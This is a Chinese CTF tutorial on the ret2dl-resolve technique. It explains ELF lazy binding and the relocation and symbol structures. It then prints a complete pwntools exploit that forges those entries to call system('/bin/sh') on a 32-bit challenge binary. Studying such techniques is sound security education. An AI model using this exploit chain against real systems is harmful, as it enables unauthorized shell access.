二栈溢出漏洞利用-ret2resolve

0x00 前言

在CTF中一般的栈溢出题目会给出程序对应的libc,这样我们在泄漏一个libc地址之后就能根据偏移量去计算libc的其他地址,比如system/bin/sh或是libc基址。
那如果题目中没有给出libc,我们就无法得知题目所用的libc版本。这个时候如果我们要计算system函数的地址的话,可以利用泄露出的libc地址去http://libcdb.com搜索对应的libc版本,因为一个libc函数地址的低三位在对应的libc版本中总是不变的。(当然你也可能搜不到)
今天要介绍的这项技术就是”Return_to_dl_resolve“。
理论上来讲,它能在不泄露libc地址、不需要知道libc版本的情况下完成任意libc函数的调用。(包括system
在正式介绍这项技术之前,先了解一下相关知识。

0x01 背景知识

我们应该知道Linux glibc函数在第一次被调用的时候才会去寻找真正的函数地址并进行绑定(不了解这块知识可以百度“PLT 延迟绑定”),而解析函数地址的工作由函数dl_runtime_resolve来完成。

上面一张图片简单描述了第一次调用函数的流程。而要说到dl_runtime_resolve如何解析函数,那就不得不提到ELF文件中几个关键的节区了。见下图框起来的部分。

上面第一张图的STRTABSYMTABJMPREL分别就是第二张图的dynstrdynsymrel.plt , 上图也提供了如何查看这些信息的命令。

要谈到这些节区的关系,我们先从dl_runtime_resolve函数的参数说起。

注意到我给的函数第一次调用流程图中有两个push指令,两个push分别将参数link_mapreloc_arg压入栈中,图中我写的rel_off也就是参数reloc_arg,另一个就是link_map。
rel_off即为需要重定位的函数在rel_plt节中的偏移,该节查看如下

上面是重定位变量,下面是重定位函数,我们主要看下面的部分。
比如第一个函数setbuf,在表中占第一位,那么它的rel_off就为0,第二个函数read的偏移就为8.第n个函数的偏移为n*len_of_elfRel,在32位程序中len_of_elfRel大小为8.
elfRel为保存每个重定位函数信息的数据结构
结构如下

typedef struct {
Elf32_Addr r_offset;    
Elf32_Word r_info;      // 符号表索引
} Elf32_Rel;

r_offset就是该函数在got表的位置,r_info用来检索函数其他信息在节区dynsym中的位置。

ELF32_R_SYM(Elf32_Rel->r_info) = (Elf32_Rel->r_info) >> 8  

dynsym节区中每个存储函数信息的数据结构如下:

typedef struct
{
    Elf32_Word st_name;     // Symbol name(string tbl index)
    Elf32_Addr st_value;    // Symbol value
    Elf32_Word st_size;     // Symbol size
    unsigned char st_info;  // Symbol type and binding
    unsigned char st_other; // Symbol visibility under glibc>=2.2
    Elf32_Section st_shndx; // Section index
} Elf32_Sym;

查看内存的话一般看到的是下面这个样子的:

前四个字节的值是函数的名称在dynstr表中的偏移,dynstr基址加上这个偏移就是对应函数名称所在的位置。

dynstr表中装有需要重定位的函数和变量名称的字符串。

前面提到过,函数的解析工作是由dl_runtime_reslove函数完成的。

该函数是用汇编语言实现的,而在其中会首先调用一个函数 dl_fixup,参数由寄存器传递。

我们关注一些关键部分即可:

那么我们的漏洞利用思路就比较清晰了

0x02 思路

  1. 伪造一个很大的rel_off参数,使reloc落在我们可控的范围。
  2. 将参数压栈,控制eip跳到plt[0]
  3. 伪造reloc内容,第一个为需要覆写的GOT表地址,一个是dynsym的索引值。伪造索引值可以使得sym落在我们可控范围内。
  4. 伪造sym中的st_name所代表的偏移值,可以使得str落在我们可控范围内。
  5. 伪造str的值,比如system

我在上次写到的NSCTF的wp中有说到那两道题目都可以通过ret2resolve完成攻击,那么这次我就一其中一题作为例子来做演示。

0x03 EXP(PWN1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from pwn import *
#Setting--------------------------------------------
EXCV = './pwn1'
HOST = 'chall.pwnable.tw'
PORT = '10103'
context(log_level='debug')
e = ELF(EXCV)
LOCAL = 1
REMOTE = 0
if LOCAL:
io = process(EXCV)
libc = e.libc
if REMOTE:
io = remote(HOST,PORT)
libc = ELF('libc_32.so.6')
#---------------------------------------------------
dynsym = 0x080481dc
dynstr = 0x0804829c
rel_plt = 0x0804836c
setbuf_got = e.got['setbuf']
setbuf_plt = e.plt['setbuf']
data = 0x0804a080
base = data+800
fake_rel_addr = base+80 #fake_rel
fake_sym_addr = fake_rel_addr+8 #fake_sym
align = 0x10-(fake_sym_addr-dynsym)&0xf
fake_sym_addr += align
index = (fake_sym_addr-dynsym)/0x10
index = (index<<8)|7
fake_str_addr = fake_sym_addr+0x10 #fake_str
str_off = fake_str_addr-dynstr
shell = base+128
plt_0 = 0x080483d0
rel_off = fake_rel_addr-rel_plt
wri_plt = e.plt['write']
rd_plt = e.plt['read']
ppp_ret = 0x0804865D#pop ;pop ;pop ;retn
pop_ebp = 0x0804865F#pop ebp;retn
lev_ret = 0x080484B8#leave ;retn
#----------------------------
io.recvline()
payload = 'A'*140
payload += p32(rd_plt)
payload += p32(ppp_ret)
payload += p32(0)
payload += p32(base)
payload += p32(0x1000)
payload += p32(pop_ebp)
payload += p32(base)
payload += p32(lev_ret)
io.send(payload)
io.recv() # control eip,esp
#gdb.attach(io)
payload = 'AAAA'
payload += p32(plt_0)
payload += p32(rel_off)
payload += 'AAAA'
payload += p32(shell)
payload += 'A'*(80-len(payload))
payload += p32(setbuf_got)+p32(index)
payload += 'B'*align
payload += p32(str_off)+p32(0)+p32(0)+p32(0x12)
payload += 'system\x00'
payload += 'C'*(128-len(payload))
payload += '/bin/sh\x00'
payload += 'END'
io.send(payload)
io.interactive()

这就是修改过的exp。
中间我用虚线分割的部分是一些构造ROP的地址,上面提到的三个节区的地址,以及伪造的地址及信息。
data部分是从bss段开始的,我留出了880个字节当作dl_runtime_resolve函数调用所需的栈空间,得益于这是一片可写区域。之后的空间就是我放置伪造信息的区域了。

0x04 参考文章

Return-to-dl-resolvehttp://http://pwn4.fun/2016/11/09/Return-to-dl-resolve/

0x05 写在最后

这种攻击方式相较ret2libc来讲较为复杂,操作起来也比较麻烦,而且在开了PIERELRO FULL时不好利用,慎用。